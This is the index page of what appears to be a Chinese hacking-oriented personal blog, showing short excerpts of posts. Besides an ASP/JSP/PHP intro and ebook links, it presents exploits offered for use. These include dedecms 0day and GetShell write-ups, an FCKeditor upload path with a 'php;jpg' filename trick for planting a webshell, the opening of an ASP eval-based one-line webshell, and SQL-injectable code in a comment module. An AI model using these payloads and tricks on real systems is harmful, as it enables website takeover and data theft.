黑面小窝

目前，最常用的三种动态网页语言有ASP(Active Server Pages),JSP(JavaServer Pages),PHP (Hypertext Preprocessor)。

简 介

　　ASP全名Active Server Pages，是一个WEB服务器端的开发环境，利用它可以产生和执行动态的、互动的、高性能的WEB服务应用程序。ASP采用脚本语言VBScript（Java script）作为自己的开发语言。

More...

More...

太详细了。在电脑前看我博客的同学们，你中了下面哪些招？

More...

1.vc++技术内幕第四版 (潘爱民)
ftp://210.32.157.56/课件/c++primer/vc++技术内幕IV(潘爱民).rar
2.C++经典对话系列
中文：http://www.jka77.com/book/cvst_cn.chm

3.MFC Windows 程序设计(第二版)
英文版：http://www.jka77.com/book/progmfc2.chm
中文版：暂无，制作中…

More...

• 发布作者：toby57
• 影响版本：dedecms v5.3-v5.6
• 官方地址： www.dedecms.com
• 漏洞描述： 此0day已经出现了相当长一段时间，今天配合小龙同学提供的日志看了下代码，了解了漏洞成因。大多同学对成因不感兴趣，这儿就只公布利用方法。
  ...

More...

• 发布作者：Jannock
• 影响版本： DedecmsV53-UTF8-Final
• 官方地址： www.dedecms.com
• 漏洞描述：DEDECMS 文件源码泄漏AND GetShell漏洞
  
  article_edit.php
  ...

More...

by:nmxiaoxin
今天客户要做个php站，于是官方下了这个系统，发现的这个漏洞，fckeditor编辑器漏洞大牛们都总结了，我就不多说了 本地测试成功上传weshell
只怪官方未删除test.html
上传类型: php
文件类型：nmxiaoxin.php;jpg
利用路径: /editor/editor/filemanager/upload/test.html
...

More...

asp版的，这是utf-8编码，自己看着弄吧

<%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%>
<%
var lcx = {‘名字’ : Request.form(‘#’), ‘性别’ : eval, ‘年龄’ : ‘18′, ‘昵称’ : ‘请叫我一声老大’};

More...

描述：

问题出在/comment/include/comment.class.php中关于function ajaxupdate($field, $id)的定义：

程序59行开始：

function ajaxupdate( $field, $id )
      {

          $sql = "UPDATE $this->_comment_table SET {$field} = {$field} +1 WHERE `commentid` = '$id' ";

More...

===========================================
SQL ODBC connection strings

Standard Security:

“Driver={SQLServer};Server=Your_Server_Name;Database=Your_Database_Name;Uid=Your_Username;Pwd=Your_Password;”

More...